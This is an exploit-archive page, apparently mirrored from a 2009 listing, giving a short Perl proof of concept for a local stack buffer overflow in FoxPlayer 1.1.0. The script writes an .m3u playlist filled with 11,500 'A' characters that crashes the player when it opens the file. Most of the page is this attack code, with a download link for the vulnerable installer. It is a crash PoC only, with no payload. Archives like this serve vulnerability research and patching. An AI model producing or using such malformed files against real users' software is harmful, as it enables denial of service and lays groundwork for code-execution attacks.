[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : FoxPlayer 1.1.0 (m3u File) Local Buffer Overflow PoC
# Published : 2009-08-07
# Author : opt!x hacker
# Previous Title : iRehearse (.m3u File) Local Buffer Overflow PoC
# Next Title : Spiceworks 3.6 Accept Parameter Overflow Crash Exploit
#!/usr/bin/perl
# FoxPlayer 1.1.0 (m3u) local stack overlow POC
#finded by opt!x hacker <optix@9.cn>
#download : http://files.brothersoft.com/regnow/fox-player-setup.exe
my $header="#M3u";
my $crash="A" x 11500;
my $poc=$crash;
open(myfile,'>>AIDI.m3u');
print myfile $poc;
# www.Syue.com [2009-08-07]